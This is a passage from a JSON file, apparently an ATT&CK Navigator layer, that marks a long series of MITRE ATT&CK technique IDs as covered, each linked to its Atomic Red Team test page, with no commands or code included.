d"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1
021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","s
core":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","scor
e":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"ht
tps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":t
rue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":
true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"
enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070",
"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","sc
ore":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabl
ed":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/ma
ster/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/maste
r/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T121
6.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218",
"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score"
